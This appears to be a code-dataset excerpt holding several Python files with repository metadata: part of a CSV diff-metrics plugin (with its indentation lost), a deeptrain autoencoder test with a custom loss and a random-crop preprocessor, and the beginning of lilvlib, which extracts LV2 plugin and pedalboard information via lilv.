# are not added to the metrics at all (as opposed to having `{count: 0}` or similar)
# it could possibly be exposed as an option
# depening on what are the requirements for the schema/structure of the output
continue
f_aggregated = self.map_status_function_aggregated[status]
m_status.update(f_aggregated(values_with_status))
f_per_value = self.map_status_function_per_value[status]
if f_per_value is not None:
per_value_metrics = []
if has_with_status:
per_value_metrics = values_with_status.apply(f_per_value, axis=1).to_list()
m_status['values'] = per_value_metrics
m[status] = m_status
return m
@property
def map_status_function_aggregated(self):
return {
_S.added: self.get_stats_default,
_S.deleted: self.get_stats_default,
_S.unchanged: self.get_stats_default,
_S.modified: self.get_stats_default,
}
@property
def map_status_function_per_value(self):
return {
_S.unchanged: None,
_S.added: self.get_per_value_added,
_S.deleted: self.get_per_value_deleted,
_S.modified: self.get_per_value_modified,
}
def get_stats_default(self, values):
return {'count': len(values)}
def get_per_value_added(self, value_properties):
return {
'value': value_properties[('b', _F.ORIG)],
'loc': {'row': value_properties[('b', _F.LOC_ORIG_ROW)]}
}
def get_per_value_deleted(self, value_properties):
return {
'value': value_properties[('a', _F.ORIG)],
'loc': {'row': value_properties[('a', _F.LOC_ORIG_ROW)]}
}
def get_per_value_modified(self, value_properties):
vp = value_properties
m = {}
def get_m_for_side(d, side):
return {
'original': d[(side, _F.ORIG)],
'calculated_as': d[(side, _F.CALC)],
'loc': {
'row': d[(side, _F.LOC_ORIG_ROW)]
}
}
m['a'] = get_m_for_side(vp, 'a')
m['b'] = get_m_for_side(vp, 'b')
# the key must be ('delta', '') instead of only 'delta'
# otherwise strange and horrible errors (segmentation faults from numpy/pandas) will occur
# this could be a pandas bug, so it would be good to investigate this in more detail at some point
if self.supports_numeric_delta:
m['delta'] = vp[('delta', '')]
return m
class CSVPlugin(base.Comparator):
@staticmethod
def supports():
return ['csv']
@classmethod
def description(cls):
return cls.__doc__
def gen_comparison_pairs(self, a, b):
"""
Return an iterable of (key, comparison_pair), where comparison_pair is a tuple of (item_a, item_b) with a matching key.
"""
# union of the keys of the two records
# the ordering of the first record takes precedence
# an alternative option would be to sort them, lexicographically or with a custom criteria
keys_union = {**a, **b}.keys()
for key in keys_union:
yield key, (a.get(key), b.get(key))
record_opts = {}
comment_char = '#'
def get_file_metadata(self, src):
"""
Collect and return file-level metadata.
Since it's simple, we can do it here rather than in a dedicated class.
"""
# TODO have to properly decide if Records should be passed a Processor instance or the raw input
path = Path(src)
lines = get_lines_frame(path, comment_char=self.comment_char)
return {
'path_parent': path.parent,
'filename': path.name,
'n_lines': len(lines),
'n_lines_commented': len(lines[lines['is_comment']]),
'n_lines_uncommented': len(lines[~lines['is_comment']]),
'n_chars': lines['content'].str.len().sum(),
}
def compare_file(self, src_a, src_b):
file_md_a = self.get_file_metadata(src_a)
file_md_b = self.get_file_metadata(src_b)
metrics = ChangeMetricsBase('file', file_md_a, file_md_b)
metrics.calculate()
return dict(metrics)
def columns_key_getter(self, col_metadata):
# here the only choice is which col metadata property to use
# "name", "name_header" and "colidx"
# TODO consider exposing this as a plug-in-level option (or maybe bool flag?)
return col_metadata['name']
def get_record_columns(self, *args, **kwargs):
"""
Return the Record object used to fetch, process and expose for comparison table columns.
"""
rec = CSVTableColumnsRecord(*args, comment_char=self.comment_char, **self.record_opts, **kwargs)
rec.load()
return rec
def get_change_metrics_column(self, *args, **kwargs):
"""
Return the object used to calculate change metrics for table columns.
"""
return TableColumnChangeMetrics(*args, **kwargs)
def get_change_metrics_column_values(self, *args, **kwargs):
"""
Return the object used to calculate change metrics for table column values.
"""
return TableColumnValuesChangeMetrics.from_column_metrics(*args, **kwargs)
def compare_table_data(self, src_a, src_b, **kwargs):
metr_table = {
'columns': {},
'values_by_column': {},
}
rec_a = self.get_record_columns(src_a)
rec_b = self.get_record_columns(src_b)
# for each comparison pair of columns from the two tables
for comp_key, (col_md_a, col_md_b) in self.gen_comparison_pairs(rec_a, rec_b):
# first, calculate the change metrics for the column as a whole
metr_single_col = self.get_change_metrics_column(comp_key, col_md_a, col_md_b)
metr_single_col.calculate()
# then, calculate the change metrics for the column values
metr_values = self.get_change_metrics_column_values(metr_single_col)
metr_values_data = metr_values.calculate()
# finally, add info about change in values to the column change metrics
metr_single_col.calculate_from_value_metrics(metr_values.table)
metr_table['values_by_column'][comp_key] = metr_values_data
metr_table['columns'][comp_key] = dict(metr_single_col)
return metr_table
def compare(self, path_a, path_b, **kwargs):
self._percent_change = np.nan
all_metrics = {}
all_metrics['file'] = self.compare_file(path_a, path_b)
# col_metrics also contains the value-level metrics as a DataFrame
# these should be collected separately and merged together in a single table
all_metrics['table_data'] = self.compare_table_data(path_a, path_b)
return self.get_processed_metrics(all_metrics)
def get_processed_metrics(self, metrics):
return metrics
def percent_change(self):
return self._percent_change
def get_stats_table(self, table_metrics):
all_cols_stats = []
for colname, col_metrics in table_metrics['columns'].items():
col_stats = {'name': colname}
col_stats.update(col_metrics['values'])
col_stats['status'] = col_metrics['status']
all_cols_stats.append(col_stats)
df = pd.DataFrame(all_cols_stats).set_index('name')
self._percent_change = df['frac_changed'].mean() * 100
return df
detail_level = 1
def stats(self, changes, detail_level=None):
from .util import to_json
detail_level = detail_level or self.detail_level
df_table = self.get_stats_table(changes['table_data'])
if detail_level >= 0:
# single-number change percentage:
print(f'percent change: {self.percent_change():04.2f}%')
if detail_level >= 1:
with pd.option_context('display.max_columns', None):
# overview table with per-column statistics for all columns
print(df_table)
if detail_level >= 2:
# complete change data, assumed to be dict-like (with no assumptions on structure)
out = to_json(changes)
print(out)
| 31.466667 | 127 | 0.59581 | 28,197 | 0.948245 | 601 | 0.020211 | 2,937 | 0.098769 | 0 | 0 | 7,660 | 0.2576 |
d37adc24277995ed8988a9ffcaca7dbe43d291d6 | 4,223 | py | Python | tests/customs_test.py | Mario-Kart-Felix/deeptrain | 45e066e9aa97c16780682d62250516c7d64d9897 | [
"MIT"
] | 16 | 2020-09-15T14:27:05.000Z | 2021-05-30T09:43:09.000Z | tests/customs_test.py | adbmd/deeptrain | fd412e68e23bce0d9997b0a619a6887ad557067e | [
"MIT"
] | 1 | 2020-09-18T00:44:17.000Z | 2020-09-18T14:06:00.000Z | tests/customs_test.py | adbmd/deeptrain | fd412e68e23bce0d9997b0a619a6887ad557067e | [
"MIT"
] | 3 | 2020-09-17T16:56:28.000Z | 2021-01-30T03:23:31.000Z | # -*- coding: utf-8 -*-
import os
import sys
# ensure `tests` directory path is on top of Python's module search
filedir = os.path.dirname(__file__)
sys.path.insert(0, filedir)
while filedir in sys.path[1:]:
sys.path.pop(sys.path.index(filedir)) # avoid duplication
import pytest
import numpy as np
from copy import deepcopy
from backend import K, AE_CONFIGS, BASEDIR, tempdir, notify, make_autoencoder
from backend import _init_session, _do_test_load, _get_test_names
from deeptrain.util.preprocessors import Preprocessor
from deeptrain.metrics import _standardize, _weighted_loss
#### CONFIGURE TESTING #######################################################
batch_size = 128
width, height = 28, 28
channels = 1
datadir = os.path.join(BASEDIR, 'tests', 'data', 'image')
tests_done = {}
CONFIGS = deepcopy(AE_CONFIGS)
CONFIGS['model']['batch_shape'] = (batch_size, width, height, channels)
CONFIGS['datagen']['batch_size'] = batch_size
CONFIGS['val_datagen']['batch_size'] = batch_size
def init_session(C, weights_path=None, loadpath=None, model=None):
return _init_session(C, weights_path=weights_path, loadpath=loadpath,
model=model, model_fn=make_autoencoder)
def mean_L_error(y_true, y_pred, sample_weight=1):
L = 1.5 # configurable
y_true, y_pred, sample_weight = _standardize(y_true, y_pred,
sample_weight)
return _weighted_loss(np.mean(np.abs(y_true - y_pred) ** L, axis=-1),
sample_weight)
def mLe(y_true, y_pred):
L = 1.5 # configurable
return K.mean(K.pow(K.abs(y_true - y_pred), L), axis=-1)
def numpy_loader(self, set_num):
# allow_pickle is irrelevant here, just for demo
return np.load(self._path(set_num), allow_pickle=True)
class RandCropPreprocessor(Preprocessor):
"""2D random crop. MNIST is 28x28, we try 25x25 crops,
e.g. batch[2:27, 3:28]."""
def __init__(self, size, crop_batch=True, crop_labels=False,
crop_same=False):
# length -> (length, length)
# (width, height) -> (width, height)
assert isinstance(size, (tuple, int))
self.size = size if isinstance(size, tuple) else (size, size)
self.crop_batch = crop_batch
self.crop_labels = crop_labels
self.crop_same = crop_same
def process(self, batch, labels):
if self.crop_batch:
(x_start, x_end), (y_start, y_end) = self._make_crop_mask(batch)
batch = batch[:, x_start:x_end, y_start:y_end]
if self.crop_labels:
if not self.crop_same or not self.crop_batch:
(x_start, x_end), (y_start, y_end
) = self._make_crop_mask(labels)
labels = labels[:, x_start:x_end, y_start:y_end]
return batch, labels
def _make_crop_mask(self, data):
_, w, h, *_ = data.shape # (samples, width, height, channels)
x_offset = np.random.randint(0, w - self.size[0])
y_offset = np.random.randint(0, h - self.size[1])
x_start, x_end = x_offset, x_offset + self.size[0]
y_start, y_end = y_offset, y_offset + self.size[1]
return (x_start, x_end), (y_start, y_end)
##############################################################################
@notify(tests_done)
def test_main():
C = deepcopy(AE_CONFIGS)
C['model' ].update({'loss': mLe,
'batch_shape': (128, 24, 24, 1)})
C['datagen' ].update({'data_loader': numpy_loader,
'preprocessor': RandCropPreprocessor(size=24)})
C['val_datagen'].update({'data_loader': numpy_loader,
'preprocessor': RandCropPreprocessor(size=24)})
C['traingen']['custom_metrics'] = {'mLe': mean_L_error}
with tempdir(C['traingen']['logs_dir']), \
tempdir(C['traingen']['best_models_dir']):
tg = init_session(C)
tg.train()
_do_test_load(tg, C, init_session)
##############################################################################
tests_done.update({name: None for name in _get_test_names(__name__)})
if __name__ == '__main__':
pytest.main([__file__, "-s"])
| 36.721739 | 78 | 0.604783 | 1,441 | 0.341227 | 0 | 0 | 690 | 0.163391 | 0 | 0 | 893 | 0.211461 |
d37ae81f0414cb447a6f73c440fb58c44f708e36 | 57,410 | py | Python | pluginsmanager/model/lv2/lilvlib.py | SpotlightKid/PluginsManager | 2dcc9f6a79b48e9c9be82efffd855352fa15c5c7 | [
"Apache-2.0"
] | 9 | 2017-05-24T09:55:34.000Z | 2020-06-22T03:55:51.000Z | pluginsmanager/model/lv2/lilvlib.py | SpotlightKid/PluginsManager | 2dcc9f6a79b48e9c9be82efffd855352fa15c5c7 | [
"Apache-2.0"
] | 97 | 2016-11-17T16:30:35.000Z | 2021-10-09T00:27:56.000Z | pluginsmanager/model/lv2/lilvlib.py | SpotlightKid/PluginsManager | 2dcc9f6a79b48e9c9be82efffd855352fa15c5c7 | [
"Apache-2.0"
] | 3 | 2017-05-21T19:20:38.000Z | 2019-11-04T23:53:59.000Z | """
File copy from https://github.com/moddevices/lilvlib
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------------------------------------
# Imports
import json
import lilv
import os
from math import fmod
# ------------------------------------------------------------------------------------------------------------
# Utilities
def LILV_FOREACH(collection, func):
itr = collection.begin()
while itr:
yield func(collection.get(itr))
itr = collection.next(itr)
class NS(object):
def __init__(self, world, base):
self.world = world
self.base = base
self._cache = {}
def __getattr__(self, attr):
if attr.endswith("_"):
attr = attr[:-1]
if attr not in self._cache:
self._cache[attr] = lilv.Node(self.world.new_uri(self.base+attr))
return self._cache[attr]
def is_integer(string):
return string.strip().lstrip("-+").isdigit()
def get_short_port_name(portName):
if len(portName) <= 16:
return portName
portName = portName.split("/",1)[0].split(" (",1)[0].split(" [",1)[0].strip()
# cut stuff if too big
if len(portName) > 16:
portName = portName[0] + portName[1:].replace("a","").replace("e","").replace("i","").replace("o","").replace("u","")
if len(portName) > 16:
portName = portName[:16]
return portName.strip()
# ------------------------------------------------------------------------------------------------------------
def get_category(nodes):
lv2_category_indexes = {
'DelayPlugin': ['Delay'],
'DistortionPlugin': ['Distortion'],
'WaveshaperPlugin': ['Distortion', 'Waveshaper'],
'DynamicsPlugin': ['Dynamics'],
'AmplifierPlugin': ['Dynamics', 'Amplifier'],
'CompressorPlugin': ['Dynamics', 'Compressor'],
'ExpanderPlugin': ['Dynamics', 'Expander'],
'GatePlugin': ['Dynamics', 'Gate'],
'LimiterPlugin': ['Dynamics', 'Limiter'],
'FilterPlugin': ['Filter'],
'AllpassPlugin': ['Filter', 'Allpass'],
'BandpassPlugin': ['Filter', 'Bandpass'],
'CombPlugin': ['Filter', 'Comb'],
'EQPlugin': ['Filter', 'Equaliser'],
'MultiEQPlugin': ['Filter', 'Equaliser', 'Multiband'],
'ParaEQPlugin': ['Filter', 'Equaliser', 'Parametric'],
'HighpassPlugin': ['Filter', 'Highpass'],
'LowpassPlugin': ['Filter', 'Lowpass'],
'GeneratorPlugin': ['Generator'],
'ConstantPlugin': ['Generator', 'Constant'],
'InstrumentPlugin': ['Generator', 'Instrument'],
'OscillatorPlugin': ['Generator', 'Oscillator'],
'ModulatorPlugin': ['Modulator'],
'ChorusPlugin': ['Modulator', 'Chorus'],
'FlangerPlugin': ['Modulator', 'Flanger'],
'PhaserPlugin': ['Modulator', 'Phaser'],
'ReverbPlugin': ['Reverb'],
'SimulatorPlugin': ['Simulator'],
'SpatialPlugin': ['Spatial'],
'SpectralPlugin': ['Spectral'],
'PitchPlugin': ['Spectral', 'Pitch Shifter'],
'UtilityPlugin': ['Utility'],
'AnalyserPlugin': ['Utility', 'Analyser'],
'ConverterPlugin': ['Utility', 'Converter'],
'FunctionPlugin': ['Utility', 'Function'],
'MixerPlugin': ['Utility', 'Mixer'],
#'MIDIPlugin': ['MIDI', 'Utility'],
}
mod_category_indexes = {
'DelayPlugin': ['Delay'],
'DistortionPlugin': ['Distortion'],
'DynamicsPlugin': ['Dynamics'],
'FilterPlugin': ['Filter'],
'GeneratorPlugin': ['Generator'],
'ModulatorPlugin': ['Modulator'],
'ReverbPlugin': ['Reverb'],
'SimulatorPlugin': ['Simulator'],
'SpatialPlugin': ['Spatial'],
'SpectralPlugin': ['Spectral'],
'UtilityPlugin': ['Utility'],
'MIDIPlugin': ['Utility', 'MIDI'],
}
def fill_in_lv2_category(node):
category = node.as_string().replace("http://lv2plug.in/ns/lv2core#","")
if category in lv2_category_indexes.keys():
return lv2_category_indexes[category]
return []
def fill_in_mod_category(node):
category = node.as_string().replace("http://moddevices.com/ns/mod#","")
if category in mod_category_indexes.keys():
return mod_category_indexes[category]
return []
categories = []
for cat in [cat for catlist in LILV_FOREACH(nodes, fill_in_mod_category) for cat in catlist]:
if cat not in categories:
categories.append(cat)
if len(categories) > 0:
return categories
for cat in [cat for catlist in LILV_FOREACH(nodes, fill_in_lv2_category) for cat in catlist]:
if cat not in categories:
categories.append(cat)
return categories
def get_port_data(port, subj):
nodes = port.get_value(subj.me)
data = []
it = lilv.lilv_nodes_begin(nodes)
while not lilv.lilv_nodes_is_end(nodes, it):
dat = lilv.lilv_nodes_get(nodes, it)
it = lilv.lilv_nodes_next(nodes, it)
if dat is None:
continue
data.append(lilv.lilv_node_as_string(dat))
return data
def get_port_unit(miniuri):
# using label, render, symbol
units = {
's': ["seconds", "%f s", "s"],
'ms': ["milliseconds", "%f ms", "ms"],
'min': ["minutes", "%f mins", "min"],
'bar': ["bars", "%f bars", "bars"],
'beat': ["beats", "%f beats", "beats"],
'frame': ["audio frames", "%f frames", "frames"],
'm': ["metres", "%f m", "m"],
'cm': ["centimetres", "%f cm", "cm"],
'mm': ["millimetres", "%f mm", "mm"],
'km': ["kilometres", "%f km", "km"],
'inch': ["inches", """%f\"""", "in"],
'mile': ["miles", "%f mi", "mi"],
'db': ["decibels", "%f dB", "dB"],
'pc': ["percent", "%f%%", "%"],
'coef': ["coefficient", "* %f", "*"],
'hz': ["hertz", "%f Hz", "Hz"],
'khz': ["kilohertz", "%f kHz", "kHz"],
'mhz': ["megahertz", "%f MHz", "MHz"],
'bpm': ["beats per minute", "%f BPM", "BPM"],
'oct': ["octaves", "%f octaves", "oct"],
'cent': ["cents", "%f ct", "ct"],
'semitone12TET': ["semitones", "%f semi", "semi"],
'degree': ["degrees", "%f deg", "deg"],
'midiNote': ["MIDI note", "MIDI note %d", "note"],
}
if miniuri in units.keys():
return units[miniuri]
return ("","","")
# ------------------------------------------------------------------------------------------------------------
# get_bundle_dirname
def get_bundle_dirname(bundleuri):
bundle = lilv.lilv_uri_to_path(bundleuri)
if not os.path.exists(bundle):
raise IOError(bundleuri)
if os.path.isfile(bundle):
bundle = os.path.dirname(bundle)
return bundle
# ------------------------------------------------------------------------------------------------------------
# get_pedalboard_info
# Get info from an lv2 bundle
# @a bundle is a string, consisting of a directory in the filesystem (absolute pathname).
def get_pedalboard_info(bundle):
# lilv wants the last character as the separator
bundle = os.path.abspath(bundle)
if not bundle.endswith(os.sep):
bundle += os.sep
# Create our own unique lilv world
# We'll load a single bundle and get all plugins from it
world = lilv.World()
# this is needed when loading specific bundles instead of load_all
# (these functions are not exposed via World yet)
lilv.lilv_world_load_specifications(world.me)
lilv.lilv_world_load_plugin_classes(world.me)
# convert bundle string into a lilv node
bundlenode = lilv.lilv_new_file_uri(world.me, None, bundle)
# load the bundle
world.load_bundle(bundlenode)
# free bundlenode, no longer needed
lilv.lilv_node_free(bundlenode)
# get all plugins in the bundle
plugins = world.get_all_plugins()
# make sure the bundle includes 1 and only 1 plugin (the pedalboard)
if plugins.size() != 1:
raise Exception('get_pedalboard_info(%s) - bundle has 0 or > 1 plugin'.format(bundle))
# no indexing in python-lilv yet, just get the first item
plugin = None
for p in plugins:
plugin = p
break
if plugin is None:
raise Exception('get_pedalboard_info(%s) - failed to get plugin, you are using an old lilv!'.format(bundle))
# define the needed stuff
ns_rdf = NS(world, lilv.LILV_NS_RDF)
ns_lv2core = NS(world, lilv.LILV_NS_LV2)
ns_ingen = NS(world, "http://drobilla.net/ns/ingen#")
ns_mod = NS(world, "http://moddevices.com/ns/mod#")
ns_modpedal = NS(world, "http://moddevices.com/ns/modpedal#")
# check if the plugin is a pedalboard
def fill_in_type(node):
return node.as_string()
plugin_types = [i for i in LILV_FOREACH(plugin.get_value(ns_rdf.type_), fill_in_type)]
if "http://moddevices.com/ns/modpedal#Pedalboard" not in plugin_types:
raise Exception('get_pedalboard_info(%s) - plugin has no mod:Pedalboard type'.format(bundle))
# let's get all the info now
ingenarcs = []
ingenblocks = []
info = {
'name' : plugin.get_name().as_string(),
'uri' : plugin.get_uri().as_string(),
'author': plugin.get_author_name().as_string() or "", # Might be empty
'hardware': {
# we save this info later
'audio': {
'ins' : 0,
'outs': 0
},
'cv': {
'ins' : 0,
'outs': 0
},
'midi': {
'ins' : 0,
'outs': 0
}
},
'size': {
'width' : plugin.get_value(ns_modpedal.width).get_first().as_int(),
'height': plugin.get_value(ns_modpedal.height).get_first().as_int(),
},
'screenshot' : os.path.basename(plugin.get_value(ns_modpedal.screenshot).get_first().as_string() or ""),
'thumbnail' : os.path.basename(plugin.get_value(ns_modpedal.thumbnail).get_first().as_string() or ""),
'connections': [], # we save this info later
'plugins' : [] # we save this info later
}
# connections
arcs = plugin.get_value(ns_ingen.arc)
it = arcs.begin()
while not arcs.is_end(it):
arc = arcs.get(it)
it = arcs.next(it)
if arc.me is None:
continue
head = lilv.lilv_world_get(world.me, arc.me, ns_ingen.head.me, None)
tail = lilv.lilv_world_get(world.me, arc.me, ns_ingen.tail.me, None)
if head is None or tail is None:
continue
ingenarcs.append({
"source": lilv.lilv_uri_to_path(lilv.lilv_node_as_string(tail)).replace(bundle,"",1),
"target": lilv.lilv_uri_to_path(lilv.lilv_node_as_string(head)).replace(bundle,"",1)
})
# hardware ports
handled_port_uris = []
ports = plugin.get_value(ns_lv2core.port)
it = ports.begin()
while not ports.is_end(it):
port = ports.get(it)
it = ports.next(it)
if port.me is None:
continue
# check if we already handled this port
port_uri = port.as_uri()
if port_uri in handled_port_uris:
continue
if port_uri.endswith("/control_in") or port_uri.endswith("/control_out"):
continue
handled_port_uris.append(port_uri)
# get types
port_types = lilv.lilv_world_find_nodes(world.me, port.me, ns_rdf.type_.me, None)
if port_types is None:
continue
portDir = "" # input or output
portType = "" # atom, audio or cv
it2 = lilv.lilv_nodes_begin(port_types)
while not lilv.lilv_nodes_is_end(port_types, it2):
port_type = lilv.lilv_nodes_get(port_types, it2)
it2 = lilv.lilv_nodes_next(port_types, it2)
if port_type is None:
continue
port_type_uri = lilv.lilv_node_as_uri(port_type)
if port_type_uri == "http://lv2plug.in/ns/lv2core#InputPort":
portDir = "input"
elif port_type_uri == "http://lv2plug.in/ns/lv2core#OutputPort":
portDir = "output"
elif port_type_uri == "http://lv2plug.in/ns/lv2core#AudioPort":
portType = "audio"
elif port_type_uri == "http://lv2plug.in/ns/lv2core#CVPort":
portType = "cv"
elif port_type_uri == "http://lv2plug.in/ns/ext/atom#AtomPort":
portType = "atom"
if not (portDir or portType):
continue
if portType == "audio":
if portDir == "input":
info['hardware']['audio']['ins'] += 1
else:
info['hardware']['audio']['outs'] += 1
elif portType == "atom":
if portDir == "input":
info['hardware']['midi']['ins'] += 1
else:
info['hardware']['midi']['outs'] += 1
elif portType == "cv":
if portDir == "input":
info['hardware']['cv']['ins'] += 1
else:
info['hardware']['cv']['outs'] += 1
# plugins
blocks = plugin.get_value(ns_ingen.block)
it = blocks.begin()
while not blocks.is_end(it):
block = blocks.get(it)
it = blocks.next(it)
if block.me is None:
continue
protouri1 = lilv.lilv_world_get(world.me, block.me, ns_lv2core.prototype.me, None)
protouri2 = lilv.lilv_world_get(world.me, block.me, ns_ingen.prototype.me, None)
if protouri1 is not None:
proto = protouri1
elif protouri2 is not None:
proto = protouri2
else:
continue
instance = lilv.lilv_uri_to_path(lilv.lilv_node_as_string(block.me)).replace(bundle,"",1)
uri = lilv.lilv_node_as_uri(proto)
enabled = lilv.lilv_world_get(world.me, block.me, ns_ingen.enabled.me, None)
builder = lilv.lilv_world_get(world.me, block.me, ns_mod.builderVersion.me, None)
release = lilv.lilv_world_get(world.me, block.me, ns_mod.releaseNumber.me, None)
minorver = lilv.lilv_world_get(world.me, block.me, ns_lv2core.minorVersion.me, None)
microver = lilv.lilv_world_get(world.me, block.me, ns_lv2core.microVersion.me, None)
ingenblocks.append({
"instance": instance,
"uri" : uri,
"x" : lilv.lilv_node_as_float(lilv.lilv_world_get(world.me, block.me, ns_ingen.canvasX.me, None)),
"y" : lilv.lilv_node_as_float(lilv.lilv_world_get(world.me, block.me, ns_ingen.canvasY.me, None)),
"enabled" : lilv.lilv_node_as_bool(enabled) if enabled is not None else False,
"builder" : lilv.lilv_node_as_int(builder) if builder else 0,
"release" : lilv.lilv_node_as_int(release) if release else 0,
"minorVersion": lilv.lilv_node_as_int(minorver) if minorver else 0,
"microVersion": lilv.lilv_node_as_int(microver) if microver else 0,
})
info['connections'] = ingenarcs
info['plugins'] = ingenblocks
return info
# ------------------------------------------------------------------------------------------------------------
# get_pedalboard_name
# Faster version of get_pedalboard_info when we just need to know the pedalboard name
# @a bundle is a string, consisting of a directory in the filesystem (absolute pathname).
def get_pedalboard_name(bundle):
# lilv wants the last character as the separator
bundle = os.path.abspath(bundle)
if not bundle.endswith(os.sep):
bundle += os.sep
# Create our own unique lilv world
# We'll load a single bundle and get all plugins from it
world = lilv.World()
# this is needed when loading specific bundles instead of load_all
# (these functions are not exposed via World yet)
lilv.lilv_world_load_specifications(world.me)
lilv.lilv_world_load_plugin_classes(world.me)
# convert bundle string into a lilv node
bundlenode = lilv.lilv_new_file_uri(world.me, None, bundle)
# load the bundle
world.load_bundle(bundlenode)
# free bundlenode, no longer needed
lilv.lilv_node_free(bundlenode)
# get all plugins in the bundle
plugins = world.get_all_plugins()
# make sure the bundle includes 1 and only 1 plugin (the pedalboard)
if plugins.size() != 1:
raise Exception('get_pedalboard_info(%s) - bundle has 0 or > 1 plugin'.format(bundle))
# no indexing in python-lilv yet, just get the first item
plugin = None
for p in plugins:
plugin = p
break
if plugin is None:
raise Exception('get_pedalboard_info(%s) - failed to get plugin, you are using an old lilv!'.format(bundle))
# define the needed stuff
ns_rdf = NS(world, lilv.LILV_NS_RDF)
# check if the plugin is a pedalboard
def fill_in_type(node):
return node.as_string()
plugin_types = [i for i in LILV_FOREACH(plugin.get_value(ns_rdf.type_), fill_in_type)]
if "http://moddevices.com/ns/modpedal#Pedalboard" not in plugin_types:
raise Exception('get_pedalboard_info(%s) - plugin has no mod:Pedalboard type'.format(bundle))
return plugin.get_name().as_string()
# ------------------------------------------------------------------------------------------------------------
# plugin_has_modgui
# Check if a plugin has modgui
def plugin_has_modgui(world, plugin):
# define the needed stuff
ns_modgui = NS(world, "http://moddevices.com/ns/modgui#")
# --------------------------------------------------------------------------------------------------------
# get the proper modgui
modguigui = None
nodes = plugin.get_value(ns_modgui.gui)
it = nodes.begin()
while not nodes.is_end(it):
mgui = nodes.get(it)
it = nodes.next(it)
if mgui.me is None:
continue
resdir = world.find_nodes(mgui.me, ns_modgui.resourcesDirectory.me, None).get_first()
if resdir.me is None:
continue
modguigui = mgui
if os.path.expanduser("~") in lilv.lilv_uri_to_path(resdir.as_string()):
# found a modgui in the home dir, stop here and use it
break
del nodes, it
# --------------------------------------------------------------------------------------------------------
# check selected modgui
if modguigui is None or modguigui.me is None:
return False
# resourcesDirectory *must* be present
modgui_resdir = world.find_nodes(modguigui.me, ns_modgui.resourcesDirectory.me, None).get_first()
if modgui_resdir.me is None:
return False
return os.path.exists(lilv.lilv_uri_to_path(modgui_resdir.as_string()))
# ------------------------------------------------------------------------------------------------------------
# get_plugin_info
# Get info from a lilv plugin
# This is used in get_plugins_info below and MOD-SDK
def get_plugin_info(world, plugin, useAbsolutePath = True):
# define the needed stuff
ns_doap = NS(world, lilv.LILV_NS_DOAP)
ns_foaf = NS(world, lilv.LILV_NS_FOAF)
ns_rdf = NS(world, lilv.LILV_NS_RDF)
ns_rdfs = NS(world, lilv.LILV_NS_RDFS)
ns_lv2core = NS(world, lilv.LILV_NS_LV2)
ns_atom = NS(world, "http://lv2plug.in/ns/ext/atom#")
ns_midi = NS(world, "http://lv2plug.in/ns/ext/midi#")
ns_morph = NS(world, "http://lv2plug.in/ns/ext/morph#")
ns_pprops = NS(world, "http://lv2plug.in/ns/ext/port-props#")
ns_pset = NS(world, "http://lv2plug.in/ns/ext/presets#")
ns_units = NS(world, "http://lv2plug.in/ns/extensions/units#")
ns_mod = NS(world, "http://moddevices.com/ns/mod#")
ns_modgui = NS(world, "http://moddevices.com/ns/modgui#")
bundleuri = plugin.get_bundle_uri().as_string()
bundle = lilv.lilv_uri_to_path(bundleuri)
errors = []
warnings = []
# --------------------------------------------------------------------------------------------------------
# uri
uri = plugin.get_uri().as_string() or ""
if not uri:
errors.append("plugin uri is missing or invalid")
elif uri.startswith("file:"):
errors.append("plugin uri is local, and thus not suitable for redistribution")
#elif not (uri.startswith("http:") or uri.startswith("https:")):
#warnings.append("plugin uri is not a real url")
# --------------------------------------------------------------------------------------------------------
# name
name = plugin.get_name().as_string() or ""
if not name:
errors.append("plugin name is missing")
# --------------------------------------------------------------------------------------------------------
# binary
binary = lilv.lilv_uri_to_path(plugin.get_library_uri().as_string() or "")
if not binary:
errors.append("plugin binary is missing")
elif not useAbsolutePath:
binary = binary.replace(bundle,"",1)
# --------------------------------------------------------------------------------------------------------
# license
license = plugin.get_value(ns_doap.license).get_first().as_string() or ""
if not license:
prj = plugin.get_value(ns_lv2core.project).get_first()
if prj.me is not None:
licsnode = lilv.lilv_world_get(world.me, prj.me, ns_doap.license.me, None)
if licsnode is not None:
license = lilv.lilv_node_as_string(licsnode)
del licsnode
del prj
if not license:
errors.append("plugin license is missing")
elif license.startswith(bundleuri):
license = license.replace(bundleuri,"",1)
warnings.append("plugin license entry is a local path instead of a string")
# --------------------------------------------------------------------------------------------------------
# comment
comment = (plugin.get_value(ns_rdfs.comment).get_first().as_string() or "").strip()
# sneaky empty comments!
if len(comment) > 0 and comment == len(comment) * comment[0]:
comment = ""
if not comment:
errors.append("plugin comment is missing")
# --------------------------------------------------------------------------------------------------------
# version
microver = plugin.get_value(ns_lv2core.microVersion).get_first()
minorver = plugin.get_value(ns_lv2core.minorVersion).get_first()
if microver.me is None and minorver.me is None:
errors.append("plugin is missing version information")
minorVersion = 0
microVersion = 0
else:
if minorver.me is None:
errors.append("plugin is missing minorVersion")
minorVersion = 0
else:
minorVersion = minorver.as_int()
if microver.me is None:
errors.append("plugin is missing microVersion")
microVersion = 0
else:
microVersion = microver.as_int()
del minorver
del microver
version = "%d.%d" % (minorVersion, microVersion)
# 0.x is experimental
if minorVersion == 0:
stability = "experimental"
# odd x.2 or 2.x is testing/development
elif minorVersion % 2 != 0 or microVersion % 2 != 0:
stability = "testing"
# otherwise it's stable
else:
stability = "stable"
# --------------------------------------------------------------------------------------------------------
# author
author = {
'name' : plugin.get_author_name().as_string() or "",
'homepage': plugin.get_author_homepage().as_string() or "",
'email' : plugin.get_author_email().as_string() or "",
}
if not author['name']:
errors.append("plugin author name is missing")
if not author['homepage']:
prj = plugin.get_value(ns_lv2core.project).get_first()
if prj.me is not None:
maintainer = lilv.lilv_world_get(world.me, prj.me, ns_doap.maintainer.me, None)
if maintainer is not None:
homepage = lilv.lilv_world_get(world.me, maintainer, ns_foaf.homepage.me, None)
if homepage is not None:
author['homepage'] = lilv.lilv_node_as_string(homepage)
del homepage
del maintainer
del prj
if not author['homepage']:
warnings.append("plugin author homepage is missing")
if not author['email']:
pass
elif author['email'].startswith(bundleuri):
author['email'] = author['email'].replace(bundleuri,"",1)
warnings.append("plugin author email entry is missing 'mailto:' prefix")
elif author['email'].startswith("mailto:"):
author['email'] = author['email'].replace("mailto:","",1)
# --------------------------------------------------------------------------------------------------------
# brand
brand = plugin.get_value(ns_mod.brand).get_first().as_string() or ""
if not brand:
brand = author['name'].split(" - ",1)[0].split(" ",1)[0]
brand = brand.rstrip(",").rstrip(";")
if len(brand) > 11:
brand = brand[:11]
warnings.append("plugin brand is missing")
elif len(brand) > 11:
